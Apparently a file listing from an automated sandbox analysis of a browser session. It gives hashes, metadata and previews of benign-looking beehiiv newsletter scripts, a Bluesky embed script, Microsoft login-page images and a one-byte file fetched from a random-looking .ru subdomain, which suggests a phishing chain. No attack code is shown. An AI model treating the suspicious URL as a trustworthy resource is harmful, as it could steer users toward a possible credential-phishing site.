                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru/gqtSNJAleszsNoxnKlIivCwIdXZAFVCCENEYUPUNAJEFCKPKPVUEGGAEPVBBZAAIHBSVKUFLQAW
                                                                                                                                            Preview:1
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):21786
                                                                                                                                            Entropy (8bit):4.484904166691514
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:nFapr713dQ1Z14EDZ2wj2opscJQQ9sY0a89sQaEWzkwB0:nU713ODZrj2opxd6sQdwu
                                                                                                                                            MD5:C5E53AE2E3FCA3A16D52D66B2E051135
                                                                                                                                            SHA1:898D9113ECE2A24E55E4EAA591B84E8787E896AC
                                                                                                                                            SHA-256:3F12C9FF7CD33F82332F4DFC4B3117CD49A45073AFAECF3C3F4687BA9BE68B0A
                                                                                                                                            SHA-512:F6609A35A0802DF4FF8F1F70333A772F16FE69D79395901CF424161FE940CB81037C7BFEA0854B8FB9864E8D905F9683819E1D954143C8541856AF1CD3DF8F95
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:{. "admin": {. "modal": {. "title": "You're logged in as an admin",. "description": "At this time, admin functions are limited to: Commenting on posts, Deleting comments on posts.". }. },. "comments": {. "header": "Join the conversation",. "upgrade": {. "title": "Upgrade to continue",. "description": "Please upgrade to premium to participate in this discussion!",. "cta": "Upgrade Now". },. "like": "Like",. "loading": {. "loading": "Loading",. "load_more": "Load more". },. "reporting": {. "report": "Report",. "reporting": "Reporting",. "reported": "Reported",. "report_action_placeholder": "Add a note for the moderator",. "file_report": "File a report",. "filing_report_for": "Filing a report for". },. "deleting": {. "delete": "Delete",. "deleting": "Deleting",. "deleted": "Deleted",. "deleting_comment": "Deleting comment",. "delete_comment": "Delete Comment",.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):673
                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2672
                                                                                                                                            Entropy (8bit):6.640973516071413
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3720)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4087
                                                                                                                                            Entropy (8bit):5.383346971286598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Qql8ewtMDRvkGvhJI3C7iYd5yrjNVwU3k78o2pTsVUHKWXe:5QwRcGMS7UV70UtsVUqX
                                                                                                                                            MD5:B17C2F05D9CE765ED732F5865598AF97
                                                                                                                                            SHA1:D5DCB8F9374345C64F3AF65F134C4C0FFDA0D10C
                                                                                                                                            SHA-256:59CECCE22EBEB5BEF6645BA62A5DDC9D21DD7E4E5F8FA3B53506B3C673CC82EC
                                                                                                                                            SHA-512:90E9D8AB9D407C71D672E0B0718EED31E1D2E721A966897B9C04CDAD9F887E3EC53968B37C30018C73365A01F0E1B3FE5114EB76674F414490C1D2F7802F2673
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b446271b-ea24-50dc-a052-26fc7486002e")}catch(e){}}();.import{r as d}from"./index-D6da9p6-.js";import{I as $,R as k,g as A,a as F}from"./context-CxfOs_9L.js";function M(){if(console&&console.warn){for(var t=arguments.length,e=new Array(t),n=0;n<t;n++)e[n]=arguments[n];typeof e[0]=="string"&&(e[0]=`react-i18next:: ${e[0]}`),console.warn(...e)}}const T={};function C(){for(var t=arguments.length,e=new Array(t),n=0;n<t;n++)e[n]=arguments[n];typeof e[0]=="string"&&T[e[0]]||(typeof e[0]=="string"&&(T[e[0]]=new Date),M(...e))}const v=(t,e)=>()=>{if(t.isInitialized)e();else{const n=()=>{setTimeout(()=>{t.off("initialized",n)},0),e()};t.on("initialized",n)}};function S(t,e,n){t.loadNamespaces(e,v(t,n))}function R(t,e,n,a){typeof n=="string"&&(n=[n]),n.forEach(i=>{t.options.ns.indexOf(i)<0&
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):536
                                                                                                                                            Entropy (8bit):5.609334933818731
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSAqMNw2dpavI+wtiHpW4L6q9:UgqHHVvCaRuSNMNxbavTwtiwe79
                                                                                                                                            MD5:71DA4CD621E9E533179C44473C9F558F
                                                                                                                                            SHA1:D107DDDDBBA685F3814BA6CBB248B70FB03A5D8D
                                                                                                                                            SHA-256:32C71DFD42E5C64E61C4C80D20153D755B2BDB312B63BD9B4FBA9A5F673949AE
                                                                                                                                            SHA-512:E3C1B615C8190FA9BFE8FF88828927A85A91C64A0A205963008004FD60835F78A48D5614C3D9E7E0718FAFC13E084E7F8B83F54C176DA0E329EFC24847253A73
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-DIU-Hrs1.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0c611f49-1d08-5b35-bc2f-55f3bd461270")}catch(e){}}();.import{j as r}from"./jsx-runtime-BjG_zV1W.js";const e=({children:s,noLayout:t})=>t?r.jsx(r.Fragment,{children:s}):r.jsx("main",{className:"flex-grow",children:s});export{e as M};.//# sourceMappingURL=index-DIU-Hrs1.js.map..//# debugId=0c611f49-1d08-5b35-bc2f-55f3bd461270.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3685)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4057
                                                                                                                                            Entropy (8bit):5.300265116020326
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Q1SUeyPQf2WAp8SOy238uGhr6g2KTyfRfGoScIjR8GRCn:iIf7AM38u9gnTyJeohIjR8pn
                                                                                                                                            MD5:1643130158219F4EA4300606014D04F5
                                                                                                                                            SHA1:B615BEE9DEBAB5BBCAA8FFFAFACF7C549E94BA7A
                                                                                                                                            SHA-256:3EC4679F9991CC1F302C6C93EB9CA00EBAE2E3B5C0067C2DB7935219C3E3348E
                                                                                                                                            SHA-512:6CBDA17AC08ADF675F95D88E105363FC7791A4D4B8A012A1A4B206E4D0D25299766B7016A44F0198C531FDCA8107F7D110C6931DCCBF73EB51F044E81543CD68
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6f187ca3-2a88-5d12-9cc0-ce24fb6a71f1")}catch(e){}}();.import{r as n,e as m}from"./index-D6da9p6-.js";import{s as b,o as d,t as M,U as C,y as g,c as w,e as y,f as S,l as E,C as $}from"./keyboard-CaEu2o0u.js";import{a as F,n as h}from"./transition-y-5XFFuu.js";import{r as H}from"./components-Oj2xMfGE.js";import{f as T,s as x}from"./hidden-KuoXmiN5.js";function Q(e,t,l,r){let s=b(l);n.useEffect(()=>{e=e??window;function a(u){s.current(u)}return e.addEventListener(t,a,r),()=>e.removeEventListener(t,a,r)},[e,t,r])}function L(e){let t=d(e),l=n.useRef(!1);n.useEffect(()=>(l.current=!1,()=>{l.current=!0,M(()=>{l.current&&t()})}),[t])}var k=(e=>(e[e.Forwards=0]="Forwards",e[e.Backwards=1]="Backwards",e))(k||{});function V(){let e=n.useRef(0);return F("keydown",t=>{t.key==="Tab"&&(e.curren
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1072
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):501
                                                                                                                                            Entropy (8bit):7.533810358417031
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:XUlPgzpWVSbK9DKQ+qd6Lorm5ZzRxNqwWtMD:X+PgFWVSOtKQVdgorm9xNqa
                                                                                                                                            MD5:BA297DB577E890A1F50C7F314593760A
                                                                                                                                            SHA1:D93F9FF0EFB410F657410C1F4CFA55B7BC13ABD5
                                                                                                                                            SHA-256:2B4308FBE02E743CE59DFED30712AA354299BC9357C2B81084BC325613283CD6
                                                                                                                                            SHA-512:7364B143ADD330317974EE1A92AA5D238FCD2013E30DD2CC568EA50A7DF856A6392BDFD07B59C79C34220C660338D6D40B48379C23E9CFFCD16626AFDF022601
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/credentialoptions/cred_option_passkey_1500b2043f4d1698f9df6089f67559d7.svg
                                                                                                                                            Preview:..........}S=o.0....?..\...".P-..5C..Vm..m$....;G...(4...{...t.|.i.....s.v.~.....q.vz.........p...8v......w....e....O.OO....VJ.}......s.......:..)..p.R":dO%D.....0x.*;....*-..San......'....7.UQ....;....O..u.....f.....=..(.3..J.nX.A.*..|B.%.6..."p.E8.Y.u.RJ.P..WM.dkA.W..*P.a..........w.u<.6...<....R.&2..B*..S.bnX..H0....}.B.n..b.8.=..Z.cq./..+...:Z..1a..R7,>.`..p.....J.c.=g..<..(..*K.C.k...^7...>Gp.#$..x....w]x....:Z......./R.6.U.N6.v.,...Q.Zz.....:.5..'.B?..xuW........._V..'0...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):370
                                                                                                                                            Entropy (8bit):5.480696965068107
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:W5V/pADGH4LvGaDzGvdAZE2MEuuo7wW6wewSYEXnENNw1QYHJEPBAXF:UgDGH4LOaOvCaBfuS8XENwnpiBAXF
                                                                                                                                            MD5:D624A1A829245C6171AFA7A52EAABCB9
                                                                                                                                            SHA1:A86AAA544B7108482FF2D729CDCA09F8292FCFA2
                                                                                                                                            SHA-256:6DE1DD1E5F22E02D44F50664064F3A5B8E2C97CDF51B51EC821DA2056A222319
                                                                                                                                            SHA-512:93F33879D03ADAE86C6F82A623B42FD8045D7E720B95470BE5605F3DF71BB3A252B8D9B7D719C4CB861CFBF1F27B9B1FEF5A39C24100EDD3A09A7976016B2822
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="7e64629d-d049-5400-bedc-5fbef12c7d43")}catch(e){}}();..//# sourceMappingURL=recommended_posts-l0sNRNKZ.js.map..//# debugId=7e64629d-d049-5400-bedc-5fbef12c7d43.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2528
                                                                                                                                            Entropy (8bit):4.800607923042153
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:k06y8yfygq4l8YFMk8YKY+dfMBJ2feuw6G7qg/BRY92:kny8yfygq4l8YmkJKY+dfMBkZG7qgnYs
                                                                                                                                            MD5:A11C8F3D9236D7D886B329A07FFDF11D
                                                                                                                                            SHA1:3EE2927A0F6DD8CFA59BB49BAD1F9F552D15919F
                                                                                                                                            SHA-256:48EEC5118D01A7F0378C905871255CF7E1BCCC393A23B76FACA61C9AF943E90C
                                                                                                                                            SHA-512:C00CFA76499B773AC108B2DB90C14DF599A5704A3DB55A3EF9EB07B9A58C5BD62B831F1D83750CC5C1B273A0D0DC2E44565940585E9B216CAA9D5AE398954139
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://embed.bsky.app/static/embed.js
                                                                                                                                            Preview:"use strict";.var EMBED_URL = 'https://embed.bsky.app';.window.bluesky = window.bluesky || {. scan: scan,.};./**. * Listen for messages from the Bluesky embed iframe and adjust the height of. * the iframe accordingly.. */.window.addEventListener('message', function (event) {. if (event.origin !== EMBED_URL) {. return;. }. var id = event.data.id;. if (!id) {. return;. }. var embed = document.querySelector("[data-bluesky-id=\"".concat(id, "\"]"));. if (!embed) {. return;. }. var height = event.data.height;. if (height) {. embed.style.height = "".concat(height, "px");. }.});./**. * Scan the document for all elements with the data-bluesky-aturi attribute,. * and initialize them as Bluesky embeds.. *. * @param element Only scan this specific element @default document @optional. * @returns. */.function scan(node) {. if (node === void 0) { node = document; }. var embeds = node.querySelectorAll('[data-bluesky-uri]');. for
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1345)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1710
                                                                                                                                            Entropy (8bit):5.184436449759259
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE43NOX+1NVmskCksjszesPjqkAcGO/sK:Q1O1NVm3vzesPh3d/5
                                                                                                                                            MD5:C1F19D2EC2656C16DEDCF9AC7EE5A18A
                                                                                                                                            SHA1:CFB85817A27DFE2B0B638077F48AC3FA1FEAE9CD
                                                                                                                                            SHA-256:5C5C1E7A7B1B6221E631ECE207F06B85A2E434C79DF5F9D8FCF111116F7E76B9
                                                                                                                                            SHA-512:E683F2559B7CECD253F9808C9A95622EB7D2C9A7BEE22B37C273582E4F9EEEDDC4C45B85A8E026A229F3F9A7AB2801FC820FA281ECAA9950834AD35E505EF7D4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/SparklesIcon-DA4hsc2a.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c51870eb-2e2d-5bf1-aff3-34af23915c6e")}catch(e){}}();.import{r as l}from"./index-D6da9p6-.js";function o({title:a,titleId:e,...r},t){return l.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:t,"aria-labelledby":e},r),a?l.createElement("title",{id:e},a):null,l.createElement("path",{fillRule:"evenodd",d:"M9 4.5a.75.75 0 0 1 .721.544l.813 2.846a3.75 3.75 0 0 0 2.576 2.576l2.846.813a.75.75 0 0 1 0 1.442l-2.846.813a3.75 3.75 0 0 0-2.576 2.576l-.813 2.846a.75.75 0 0 1-1.442 0l-.813-2.846a3.75 3.75 0 0 0-2.576-2.576l-2.846-.813a.75.75 0 0 1 0-1.442l2.846-.813A3.75 3.75 0 0 0 7.466 7.89l.813-2.846A.75.75 0 0 1 9 4.5ZM18 1.5a.75.75 0 0 1 .728.568l.258 1.036c.236.94.97 1.674 1.91 1.91l1
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1313)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1680
                                                                                                                                            Entropy (8bit):5.360877834847203
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEgNwgiX+114GLlgjGHFhKiX+1PhpjCqM4:QXO114Cl+MhbO1Php7
                                                                                                                                            MD5:2070CB916AB5649CBFE3198C08EB7A82
                                                                                                                                            SHA1:DCD44F78294B70278B5A522ADC94EB5FC3DC9176
                                                                                                                                            SHA-256:14AB1812CDA7D000C3D536FD51EF671FA98C3A9145D6B34DC5732CD6F1D071C0
                                                                                                                                            SHA-512:2B80ACBC72392BAB69782D34142D606B8A9D4819221966691A8AF9A2869AD93CF03B9A3908685C5CC37407F5897FC5AFA1156996B548B102C5312B8D5E123FD5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/LockClosedIcon-BluoCUMI.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ab4befe2-5cea-54a4-94d2-c6fbc0e5c0d1")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function n({title:a,titleId:r,...t},l){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:l,"aria-labelledby":r},t),a?e.createElement("title",{id:r},a):null,e.createElement("path",{d:"m11.645 20.91-.007-.003-.022-.012a15.247 15.247 0 0 1-.383-.218 25.18 25.18 0 0 1-4.244-3.17C4.688 15.36 2.25 12.174 2.25 8.25 2.25 5.322 4.714 3 7.688 3A5.5 5.5 0 0 1 12 5.052 5.5 5.5 0 0 1 16.313 3c2.973 0 5.437 2.322 5.437 5.25 0 3.925-2.438 7.111-4.739 9.256a25.175 25.175 0 0 1-4.244 3.17 15.247 15.247 0 0 1-.383.219l-.022.012-.007.004-.003.001a.752.752 0 0 1-.704 0l-.003-.001Z"}))}const d=e.f
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (52847)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):101490
                                                                                                                                            Entropy (8bit):5.468371780725999
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:X6e1Wj6E1t9lLZjnrIZ7NLinbKTYMyT7/6arB0swdlPYVbG:nML9lhS0WsMyT76lPYVK
                                                                                                                                            MD5:11CC474B3A5DAC030EB4F0403AE74209
                                                                                                                                            SHA1:19FA7AE01454399F2C1D7BB7C39C131F8687410A
                                                                                                                                            SHA-256:1C9F82BCDEDB470601EECE73E7C2AA135BD6BAA958F5456C4C7758FC393C5095
                                                                                                                                            SHA-512:144F2D6815DA4F97ACF50D54D9A176D3D6391F05D36B183FCE88E7DB4A5D831C3E4A9DCE5C06267251A3FF095A2839CCE54CD07EFC94073598BF12EDD0C6C227
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="45243a5f-3b91-5121-b1a7-aa2791e29d8d")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{a as q,v as st,r as i,e as at,u as nt,O as rt,K as ot,J as Le}from"./index-D6da9p6-.js";import{_ as F,n as ne,I as it}from"./index-CqJN8iQq.js";import{c as T}from"./index-x2da_zcv.js";import{g as _e,aO as lt,c as ct}from"./AppGlobals-2Br-8bZs.js";import{C as be,u as dt}from"./index-DTtuIjz-.js";import{u as N}from"./useTranslation-CfKJAmGY.js";import{g as mt,w as ut,_ as ht,u as I,M as xt,x as ft,S as pt,L as S,d as me,f as Oe,F as Be,c as gt,b as vt}from"./components-Oj2xMfGE.js";import{F as V}from"./index-DWIcfCyK.js";import{B as A}from"./index-BxYGUTX4.js";import{T as y}from"./index-CJHGmWl4.js";import{u as E,S as Me,W as wt}from"./WebThemeContext-DttfuZxo.js";import{P as
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3685)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4057
                                                                                                                                            Entropy (8bit):5.300265116020326
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Q1SUeyPQf2WAp8SOy238uGhr6g2KTyfRfGoScIjR8GRCn:iIf7AM38u9gnTyJeohIjR8pn
                                                                                                                                            MD5:1643130158219F4EA4300606014D04F5
                                                                                                                                            SHA1:B615BEE9DEBAB5BBCAA8FFFAFACF7C549E94BA7A
                                                                                                                                            SHA-256:3EC4679F9991CC1F302C6C93EB9CA00EBAE2E3B5C0067C2DB7935219C3E3348E
                                                                                                                                            SHA-512:6CBDA17AC08ADF675F95D88E105363FC7791A4D4B8A012A1A4B206E4D0D25299766B7016A44F0198C531FDCA8107F7D110C6931DCCBF73EB51F044E81543CD68
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/use-root-containers-DmyWFwuo.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6f187ca3-2a88-5d12-9cc0-ce24fb6a71f1")}catch(e){}}();.import{r as n,e as m}from"./index-D6da9p6-.js";import{s as b,o as d,t as M,U as C,y as g,c as w,e as y,f as S,l as E,C as $}from"./keyboard-CaEu2o0u.js";import{a as F,n as h}from"./transition-y-5XFFuu.js";import{r as H}from"./components-Oj2xMfGE.js";import{f as T,s as x}from"./hidden-KuoXmiN5.js";function Q(e,t,l,r){let s=b(l);n.useEffect(()=>{e=e??window;function a(u){s.current(u)}return e.addEventListener(t,a,r),()=>e.removeEventListener(t,a,r)},[e,t,r])}function L(e){let t=d(e),l=n.useRef(!1);n.useEffect(()=>(l.current=!1,()=>{l.current=!0,M(()=>{l.current&&t()})}),[t])}var k=(e=>(e[e.Forwards=0]="Forwards",e[e.Backwards=1]="Backwards",e))(k||{});function V(){let e=n.useRef(0);return F("keydown",t=>{t.key==="Tab"&&(e.curren
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):531
                                                                                                                                            Entropy (8bit):5.448064499073803
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuS9gVNwMMsC9u4fmKBpsY:UgqHHVvCaRuSKVN5MsC9ucBBqY
                                                                                                                                            MD5:324C6AAA68A98C32851E33323BBC727F
                                                                                                                                            SHA1:73DEBC3F0A34DE291151DA17FE4D73A1E43CD748
                                                                                                                                            SHA-256:710880B72E821908482D8D40EED4822AE189D7175CA428ECF0DFBC2E819633B6
                                                                                                                                            SHA-512:24760A7321BA774D6FBA8D751678F9A81955D2844547BDAE04E7A371AEA149FF051E310EC3AD771AC3AFFEC57A9CA0559342119A65E6862A178FCA04450D7986
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5aa4b958-6306-582a-a4ee-9fa8cff5f593")}catch(e){}}();.const o=e=>{if(!e)return"";const n=e.replace(/-/g,"~").replace(/ /g,"-");return typeof window>"u"||!window.encodeURIComponent?n:window.encodeURIComponent(n)};export{o as g};.//# sourceMappingURL=index-DcpNk-OI.js.map..//# debugId=5aa4b958-6306-582a-a4ee-9fa8cff5f593.
